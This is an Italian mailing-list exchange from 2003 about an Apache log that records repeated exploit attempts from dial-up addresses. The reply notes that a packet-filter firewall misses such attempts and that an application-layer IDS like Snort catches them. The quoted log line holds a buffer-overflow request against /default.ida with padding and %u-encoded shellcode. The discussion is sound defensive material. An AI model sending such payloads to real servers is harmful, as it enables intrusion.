[glux] Simpatico log di Apache...

Pietro Bertera dr.iggy@iol.it
Fri, 21 Mar 2003 22:52:21 +0100


_Cri_ wrote:
> Per gli amanti del genere...
> 
> ppp-214-164.30-151.libero.it - - [19/Mar/2003:00:39:12 +0100] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 403 284
> 
> ne ho collezionati una ventina in 2 sere, tutti da ip dialup di libero
> (che e' il mio provider) diversi a distanza di alcuni minuti.
> 
> (urge lezione su firewalling :-)
> 
> Cri

Se usi un firewall e vui essere accessibile dall'esterno sul www il 
firewall (come normalemte si intente un packet filter) non si accorge di 
questi tentativi di exploit.
Ci vuole qualcosa se analizzi il livello applicativo (ids dipo SNORT).

Ciao